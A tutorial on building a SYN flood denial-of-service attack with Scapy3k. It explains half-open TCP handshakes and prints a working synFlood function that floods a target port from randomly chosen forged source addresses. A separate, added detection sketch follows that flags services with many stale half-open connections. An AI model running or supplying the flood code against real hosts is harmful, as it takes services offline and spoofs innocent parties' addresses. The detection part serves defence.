Using Scapy3k, the Python 3 version of Scapy, to implement a simple DDoS.
First of all, we implement the SYN flood attack. SYN flood is one of the commonly used DoS methods: by sending a large number of forged TCP connection requests, it exhausts the resources of the attacked host. The TCP three-way handshake will not be repeated here. In a SYN attack, the client sends a SYN message to the server and then never responds to the server's reply. When processing TCP requests, the server's protocol stack keeps a buffer to store the state of the handshake; if the client's message is not received within a certain period of time, the data stored for that connection in the protocol stack is discarded. An attacker takes advantage of this interval to send a large number of connection requests, all left hanging in the half-open state, which keeps consuming server resources until service is denied.
Scapy is a powerful interactive packet handler that can be used to send, sniff, parse and forge network packets. First you need to install Scapy3k:
sudo pip3 install scapy-python3
Now let's see how Scapy is used:
sudo scapy (scapy requires root privileges to send packets)
(The warning message is because there are some dependencies that are not installed, but I won't install them since we don't need to use them for this experiment)
Now let's construct a simple packet using Scapy and see:
pkt = IP(dst = "192.168.0.10")
Next we construct a SYN packet:
pkt = IP(src="202.121.0.12",dst="192.168.0.100")/TCP(dport=80,flags="S")
(We constructed an IP packet and a TCP packet and combined them, which gives us a complete TCP packet; otherwise it could not be sent out. In the IP packet we specified the source IP address src and the destination IP address dst, where src is the address that we forged. The value of flags is set to S to indicate that the packet to be sent is a SYN packet.)
Code Implementation:
The specific code is as follows:
import random
from scapy.all import *

def synFlood(tgt, dPort):
    # Forged source IP addresses
    srcList = ['201.1.1.2', '10.1.1.102', '69.1.1.2', '125.130.5.199']
    # Use a different source port for each packet sent
    for sPort in range(1024, 65535):
        # Pick one of the four forged addresses at random
        index = random.randrange(4)
        ipLayer = IP(src=srcList[index], dst=tgt)
        tcpLayer = TCP(sport=sPort, dport=dPort, flags="S")
        packet = ipLayer / tcpLayer
        send(packet)

srcList holds the forged IP addresses, and the loop changes the source port each time a packet is sent. When constructing the TCP packet we added one more parameter, sport, and the port number that changes in the loop is passed to it. We also call a function from the random module to pick a forged IP address from srcList at random. This experiment is complete; the next experiment implements a complete DDoS process.
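Seen from the defended side, the traffic this loop generates is a run of SYNs whose handshakes never complete. The sketch below is an added example, not code from the original tutorial: it counts half-open handshakes per destination service over constructed packet records (tuples using documentation-range addresses; the function names, `min_age` and `threshold` are assumptions chosen for illustration).

```python
from collections import Counter

SYN, RST, ACK = 0x02, 0x04, 0x10  # TCP flag bits

def half_open_counts(packets, now, min_age=3.0):
    """Per (dst, dport): handshakes that saw a SYN but no final ACK or RST
    from the client and have been pending for at least min_age seconds."""
    pending = {}  # (src, sport, dst, dport) -> time of the first SYN
    for ts, src, sport, dst, dport, flags in packets:
        key = (src, sport, dst, dport)
        if flags & RST:
            pending.pop(key, None)        # client aborted the attempt
        elif flags & SYN and not flags & ACK:
            pending.setdefault(key, ts)   # step 1: half-open entry created
        elif flags & ACK and not flags & SYN:
            pending.pop(key, None)        # step 3: handshake completed
    # Source addresses are forged, so aggregate by the service under load,
    # not by sender: per-source counters stay low during a spoofed flood.
    return Counter((dst, dport) for (_, _, dst, dport), ts in pending.items()
                   if now - ts >= min_age)

def flag_targets(packets, now, threshold=20):
    """Services whose count of stale half-open handshakes reaches threshold."""
    counts = half_open_counts(packets, now)
    return sorted(svc for svc, n in counts.items() if n >= threshold)

def build_sample():
    """Constructed records: (time, src, sport, dst, dport, tcp_flags)."""
    spoofed = ["198.51.100.1", "198.51.100.2", "203.0.113.5", "203.0.113.9"]
    # 40 SYNs with rotating forged sources and increasing source ports
    pkts = [(i * 0.01, spoofed[i % 4], 1024 + i, "192.0.2.10", 80, SYN)
            for i in range(40)]
    # Three ordinary clients that complete the three-way handshake
    for i in range(3):
        client = ("192.0.2.50", 40000 + i, "192.0.2.20", 443)
        pkts.append((1.0 + i, *client, SYN))
        pkts.append((1.01 + i, "192.0.2.20", 443, "192.0.2.50", 40000 + i, SYN | ACK))
        pkts.append((1.02 + i, *client, ACK))
    # A legitimate SYN still in flight at observation time (too young to count)
    pkts.append((9.5, "192.0.2.51", 40100, "192.0.2.20", 443, SYN))
    return pkts

if __name__ == "__main__":
    sample = build_sample()
    print(half_open_counts(sample, now=10.0))
    print(flag_targets(sample, now=10.0))
```

The `min_age` cut-off keeps handshakes that are merely in progress from being counted, so only entries that have sat unanswered contribute to the per-service total.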